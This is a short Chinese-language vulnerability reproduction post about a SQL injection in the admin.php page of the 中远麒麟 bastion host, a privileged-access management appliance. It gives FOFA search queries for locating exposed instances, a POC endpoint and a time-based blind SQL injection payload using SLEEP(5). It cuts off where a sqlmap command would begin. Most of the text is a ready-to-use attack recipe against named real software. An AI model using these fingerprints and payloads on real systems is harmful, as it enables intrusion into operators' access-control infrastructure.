中远麒麟堡垒机SQL注入漏洞复现

简介

中远麒麟堡垒机用于运维管理的认证、授权、审计等监控管理，在该产品admin.php处存在SQL 注入漏洞。

漏洞复现

FOFA语法：

body="url=\"admin.php?controller=admin_index&action=get_user_login_fristauth&username="

或者

cert.subject="Baolei"

访问界面如下所示：

POC：  /admin.php?controller=admin_commonuser

GET请求如下：

payload:   

username=admin' AND (SELECT 12 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm

POST请求后页面返回时间延长5秒证明漏洞存在

SQLMAP命令&#x